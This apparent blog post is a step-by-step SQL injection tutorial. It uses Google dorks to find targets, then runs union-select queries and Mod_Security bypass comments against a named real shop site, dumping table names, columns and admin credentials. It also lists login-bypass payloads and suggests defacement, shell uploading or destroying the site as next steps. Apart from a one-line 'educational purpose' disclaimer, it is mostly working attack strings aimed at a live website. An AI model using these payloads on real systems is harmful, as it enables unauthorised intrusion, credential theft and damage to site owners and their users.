Basic Sql Injection Tutorials

Hello Friends !!!

I am CodeNinja a.k.a. Aakash Choudhary and now I am going to give a basic sql injection tutorial :-

What is SQL Injection:-

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

In SQL Injection we can fetch all important data from websites and can do malicious activity  or can do everything which we want. Its depend on us.

Note:- This tutorial is educational purpose. So learn this technique but don’t harm the website.

So Let’s Start —->

Part 1:- Using Google Dorks

Google Dorks is the best weapon for hackers.So use it wisely. We can find  sql injection websites using dorks.Even you can make your own Dorks

Download Google Dorks from Here :- http://pastebin.com/tq2TBbmB

You can search more Dorks from Google 😛

How to Use Google Dorks :- Lets See

Choose any Dorks and paste in Google and then Choose any site from there Like this —–>

http://lmgtfy.com/?q=inurl%3Atrainers.php%3Fid%3D

And choose any site from there —>

http://prntscr.com/525zvj

So now understand about Google Dorks

 

Part 2:Check Website Vulnerability

Now when we get website then our next part is to check website is  vulnerable to sql injection or not

For this  You have to put   ‘  after number

eg. —–> http://www.tabletworld.co.in/order.php?pid=55 ‘      <—— Notice ‘ after number

This is essential to check vulnerability in site

If site vulnerable you will see this type of Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Its mean site is vulnerable.

Sometime you will not see that error. So notice carefully site that is something images,words is missing or not

Part 3:- Find Injection Point 

Well what is Injection point? See this carefully

Normal Site :-

http://www.tabletworld.co.in

Injection Point of normal Site :-

http://prntscr.com/52689v

Hope you understand this Injection Point

But now question arise that how to find Injection Point in particular site

Well for find injection point We use following methods —->

1.Open every links of  particular site and use  ‘ to check vulnerability 

2. Using Google Dorks  :p

3. Input malicious SQLI Codes in Search bar section or in Login Section

These are Some Malicious SQLI Codes for input

‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —
‘or’1=1’

Now i will tell you to how to fin injection point using Google Dorks. Just use following Dorks in google and you will see you desired results. Just use all of that result one by one

1. inurl:.php?id= site:www.sitename.com

2. site:www.sitename.com “php?”

3.  site:www.target.com php

4. site:www.sitename.com .php? / .php?id=

5. By using bing —> ip:127.0.0.1 “php?id”   where you will use ip of particular site

6. site:”*.site.com” inurl:”php?”

7. site.com/robots.txt

8.  inurl:”.php?id=”+site:www.site.com

Here is live example of using Above Dorks

inurl:.php?id= site:http://www.tabletworld.co.in

Here is result :-

http://prntscr.com/526b0l

So use any site from there

I choose this one

http://www.tabletworld.co.in/order.php?pid=55

Hope you understand this part

Part 4:-  Real SQLI Steps coming now after get vulnerable site

Here is our target

http://www.tabletworld.co.in/order.php?pid=55

Step 1:- Use ‘ after number

http://www.tabletworld.co.in/order.php?pid=55&#8242;

Error :-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Mean site is vulnerable

Step 2:- Find number of columns

For find number of columns we use this commands

1. order by

2. group by

3. procedure analyse()

Well this time i am using only order by command. When you see order by command is not working then we use group by command

About procedure analyse() i will tell later

Order by command ——–>

http://www.tabletworld.co.in/order.php?pid=55 order by 1–       <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 10–     <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order  by 20–    <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 30–     <——- Error

Unknown Column ’30’ in ‘order clause’

Its mean number of columns is less then 30 and above than 20

Some time you will not see that error but some missing on page.So check carefully

http://www.tabletworld.co.in/order.php?pid=55  order by 25–      <—— Error

Unknown  Column ’25’ in ‘order clause’

Its mean number of columns is less than 25

http://www.tabletworld.co.in/order.php?pid=55 order by 24–       <—– No error 😀

Its mean we have  24 number of columns

Step 3: Find vulnerable Columns

Now our next step is to find vulnerable columns in those 24 columns. Because we input our sqli queries in those vulnerable columns

We use this command ——–>  union select

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Notice  –  before  55. It is necessary when use union select command.But sometimes we not use – before number. We use other methods/tricks instead of – . But when to use and what to use. I will tell about this in other tutorial

Now after that when use union select i see  this WAF Message

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

What is WAF —–> Web Application Firewall

which is use to protect website from hacking attacks.But there is lots of methods to bypass that WAF

These are WAF Messages  —->

406 Not acceptable

403 Forbidden

404

500

In above WAF Messages we use different different  methods to bypass WAF

Now come to that site where we see that above error

To bypass WAF we use  comments —->

/*!*/ like  —> /*!union*/

or

/*!50000*/   —–> /*!50000union*/

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Well the vulnerable column is —-> 5  &  7

Now our whole desire malicious queries will by putting in those vulnerable column like this

For version —–> version() & @@version

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24– 

Now see carefully. I use version() command by replacing vulnerable column 5

we can also use our queries in both vulnerable column  i.e.  5 & 7

Well why we use version there? Because after check version we come to know that what to do next

Like  —> If version is above than 5 then we can use  information_schema to dump tables,columns

But if version is below than 5 then we dump tables blindly. There we can’t use information_schema

Step 4:- Find tables data

Now our next step is to find table data of website

Commands we use for find table data is —–>

table_name

from

information_schema.tables

where

table_schema=database()

Now how and where to use that above commands?

Lets see

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database() — 

Notice:- table_name  —-> is in vulnerable column  5. And our rest commands after number 24 but before —

So remember this.  😛

Well  now the result is in message a WAF Message

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Now i use /*!50000*/ in from word like —-> /*!50000from*/

Well how you know where to put WAF Bpass method in which place. Don’t Worry.I will tell you in my other tutorial about first understanding WAF Behavior than apply that WAF Bypass Methods.

Here is the code:-

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() — 

Result :-

http://prntscr.com/528q74

Notice that 

Now i am also  use one more command —->

concat() ——> CONCAT function is used to concatenate two strings to form a single string

group_concat() ——–> GROUP_CONCAT is used when you want to have data from different column rows in a single row. For this you need to have GROUP BY to work.

concat_ws() ——-> CONCAT_WS is just to join two values.

Well in this site when we use group_concat() function we see this error —->

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

WAF Message —->

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Bypass using /*!50000group_concat*/()

Like —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000group_concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

Now Error —–>

FUNCTION marvelso_tabletworld.group_concat does not exist. Check the ‘Function Name Parsing and Resolution’ section in the Reference Manual

Its mean you can’t use group_concat function there.So we will use concat() there

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() —

Now result —->

http://prntscr.com/529rmf

You see admin table there. What if you not see admin table there? 

Two reasons —->

May be there not admin tables in database

OR 

Because of concat function we are unable to see others tables too

If we use group_concat we can  see all table details on page

But in concat function we are able to see only one table detail.But for see other table detail we use this command—->

limit 0,1

like this

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 0,1 —

You can increase limit   like this —> limit 1,1  limit 2,1  limit 3,1  etc etc

See code —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 1,1 —

And see Result —>

http://prntscr.com/529t6g

Notice that red mark. That is 2nd table of database

Another one using limit 2,1 —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 3,1 —

Another result —>

http://prntscr.com/529tl2

Another 3rd table —> customer

Hope now you understand  to use concat() function using limit 0,1 function. If not you can ask me your doubts.

Step 5:- Find Columns detail

Command for this —->

column_name

from

information_schema.columns

where

table_name=’table name here’

Note :-

Your table name should be in hex format.How i will show you

See this Code  —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e —

Where —-> 

0x61646d696e is —-> admin

Result —->

http://prntscr.com/529wlr

We again use limit function to get more column details

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 1,1–

Result —>

http://prntscr.com/529x8k

Again next column details using limit 2,1

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 2,1–

Result —->

http://prntscr.com/529xp7

So now we got our desire column details —->

id,username,password

This detail is enough for hacking as we will get admin details using that

Step 6 :-Find admin details[his name,passowrd etc]

Commands ——>

concat(username,0x3a,x3a,password)   <—–Where 0x3a is hex coding of  :

from

table name here like admin

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(username,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ admin  —

Result:-

http://prntscr.com/52a00l

So,we get admin details of database —>

username:- admin

password:- admin

Part 5:- 

What we do after get admin details i.e. username,password

Well go and find admin page of website where you  put admin details there and enter the world of admin panel.Where you can control everything.What can we do —>

1.Deface the website

2.Shell uploading

3. Destroy the website

 And much much more

Well how to get admin page of website —–>

Just try this following —>

http://sitename.com/admin

http://sitename.com/administrator

http://sitename.com/login

http://sitename.com/robots.txt

These are few. There are others more methods. You can also use  admin finder tools to find admin page.

Well how to use this all and do such things.Don’t Worry i will tell you in my next tutorials.

So stay tune.

Regards  CodeNinja a.k.a. Aakash Choudhary

THANKS

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s